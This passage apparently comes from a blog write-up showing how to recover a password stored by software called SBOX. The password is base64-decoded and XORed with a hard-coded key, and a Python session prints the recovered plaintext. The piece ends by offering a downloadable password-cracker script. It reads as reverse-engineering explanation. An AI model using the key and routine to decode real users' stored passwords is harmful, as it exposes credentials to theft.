Ok, our first char of the password was suppose to be “j” which has the value of “106” for some reason our decoder sees it as “234”

Let’s subtract these two numbers:

234 – 106 = 128

well it seems that every value that is bigger than 128 will not be decoded correctly as you can see below:

>>> chr(234)
'\xea'
>>> chr(234-128)
'j'
>>> chr(104)
'h'
>>> chr(194)
'\xc2'
>>> chr(194-128)
'B'
>>> chr(117)
'u'
>>> chr(49)
'1'
>>> chr(50)
'2'
>>> chr(51)
'3'
>>> chr(50)
'2

This means we will need to fix the python loop to check for any char that is bigger than 127 and deal with it accordingly.

>>> import base64
>>> key = ["m" ,"O" ,"D" ,"I" ,"F" ,"I" ,"E" ,"D" ,"f" ,"W" ,"p" ,"R" ,"O" ,"P" ,"E" ,"R" ,"T" ,"Y" ,"s" ,"H" ,"E" ,"E" ,"T" ,"w" ,"I"]
>>> d = base64.b64decode("hyeGPHd7dnY=")
>>> count = 0
>>> for char in d:
...     if (ord(char)!=0):
...           x = ord(char)
...           y = ord(key[count])
...           i = x^y
...           if (i > 127) :
...               i = i - 128
...               z = chr(i)
...               print z,
...               count += 1
...           else:
...               z = chr(i)
...               print z,
...               count += 1
...
j h B u 1 2 3 2

Great our encoded password was decoded correctly this time.

You can download the SBOX Password Cracker Python Script Here:

SBOX Password Cracker